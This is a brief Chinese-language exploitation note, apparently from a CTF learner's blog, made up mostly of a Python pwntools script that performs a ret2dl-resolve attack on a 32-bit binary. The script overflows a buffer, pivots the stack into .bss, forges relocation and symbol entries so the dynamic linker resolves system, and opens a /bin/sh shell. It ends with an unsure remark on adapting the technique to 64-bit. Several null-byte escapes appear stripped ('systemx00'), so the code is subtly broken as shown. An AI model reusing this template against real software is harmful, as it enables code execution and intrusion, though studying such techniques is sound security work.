http://pwn4.fun/2016/11/09/Return-to-dl-resolve/
怎么说 这个东西很十分非常的模板化
32位程序的利用
# 运行之前把所有的中文注释都删掉 from pwn import * io = process('./main') elf = ELF('./main') start = 0x080483F0 pop_pop_pop_ret = 0x08048619 bss = 0x0804A040 + 0x800 pop_ebp_ret = 0x0804861b leave_ret = 0x08048458 sleep(0.3) payload = 'A' * 0x6c payload += p32(0) payload += p32(elf.plt['read']) + p32(pop_pop_pop_ret) payload += p32(0) + p32(bss) + p32(100) #往bss读ROP payload += p32(pop_ebp_ret) + p32(bss) # 栈迁移 payload += p32(leave_ret) io.sendline(payload) msg = '/bin/sh' PLT = 0x08048380 rel_plt = 0x08048330 # objdump -s -j .rel.plt main index_offset = (bss + 28) - rel_plt dynsym = 0x080481d8 dynstr = 0x08048278 fake_sym_addr = bss + 36 align = 0x10 - ((fake_sym_addr - dynsym) & 0xf) # reloc结构体大小为0x10 需要对齐 fake_sym_addr += align index_dynsym = (fake_sym_addr - dynsym) / 0x10 r_info = (index_dynsym << 8) | 0x7 fake_rel = p32(elf.got['write']) + p32(r_info) st_name = (fake_sym_addr + 0x10) - dynstr #st_name = 0x4c fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12) payload = p32(0) # 紧接着上面都 leave 里面都 pop ebp #payload += p32(elf.plt['write']) + p32(0) payload += p32(PLT) + p32(index_offset) + p32(0) # 调用PLT里面解析reloc #payload += p32(1) + p32(bss + 80) + p32(len(msg)) payload += p32(bss + 80) + p32(0) + p32(0) payload += fake_rel payload += 'A' * align payload += fake_sym payload += 'systemx00' payload += 'A' * (80 - len(payload)) payload += msg + 'x00' payload += 'A' * (100 - len(payload)) io.sendline(payload) io.interactive()
64位的调整一下,read和write的传参使用init_csu就可以了 应该。。。